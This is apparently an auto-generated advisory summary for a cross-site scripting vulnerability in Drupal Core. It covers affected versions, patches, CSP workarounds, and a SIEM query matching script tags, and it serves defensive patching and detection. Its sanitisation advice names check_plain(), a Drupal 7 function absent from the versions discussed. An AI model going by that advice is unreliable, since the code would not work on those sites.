CVE-2024-12393
📋 TL;DR
This Cross-Site Scripting (XSS) vulnerability in Drupal Core allows attackers to inject malicious scripts into web pages viewed by other users. It affects Drupal sites running versions 8.8.0 through 10.2.10, 10.3.0 through 10.3.8, and 11.0.0 through 11.0.7. Users who view compromised pages could have their sessions hijacked or be redirected to malicious sites.
💻 Affected Systems
- Drupal Core
📦 What is this software?
Drupal by Drupal
Drupal by Drupal
Drupal by Drupal
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, take over administrative accounts, deface websites, or redirect users to phishing/malware sites.
Likely Case
Session hijacking of regular users, cookie theft, or defacement of public-facing pages.
If Mitigated
Limited impact if proper Content Security Policy (CSP) headers are implemented and user input validation is enforced.
🎯 Exploit Status
Exploitation requires the ability to inject malicious content into Drupal pages, typically through user input fields or content creation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.2.11, 10.3.9, 11.0.8
Vendor Advisory: https://www.drupal.org/sa-core-2024-003
Restart Required: No
Instructions:
1. Backup your Drupal site and database. 2. Update Drupal Core to version 10.2.11, 10.3.9, or 11.0.8 depending on your current version. 3. Clear all caches via admin interface or drush command: drush cr
🔧 Temporary Workarounds
Implement Content Security Policy
allAdd CSP headers to restrict script execution sources
Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Or configure in web server settings
Input Validation Filter
allImplement additional input sanitization for user-submitted content
Implement custom form validation using Drupal's Form API
Use check_plain() or Html::escape() functions on output
🧯 If You Can't Patch
- Implement strict Content Security Policy headers to limit script execution
- Disable or restrict user content submission features until patching is possible
🔍 How to Verify
Check if Vulnerable:
Check Drupal version via admin interface at /admin/reports/status or run: drush status | grep 'Drupal version'Check Version:
drush status | grep 'Drupal version' OR check /admin/reports/status in browserVerify Fix Applied:
Confirm version is 10.2.11, 10.3.9, or 11.0.8 or higher. Check that all core updates were applied successfully.📡 Detection & Monitoring
Log Indicators:
- Unusual content submissions with script tags
- Multiple failed login attempts from new locations
- Watchdog entries showing suspicious input patterns
Network Indicators:
- Unexpected external script loads in page responses
- Suspicious redirects from Drupal pages
SIEM Query:
source="drupal_access" AND (message="*<script>*" OR message="*javascript:*")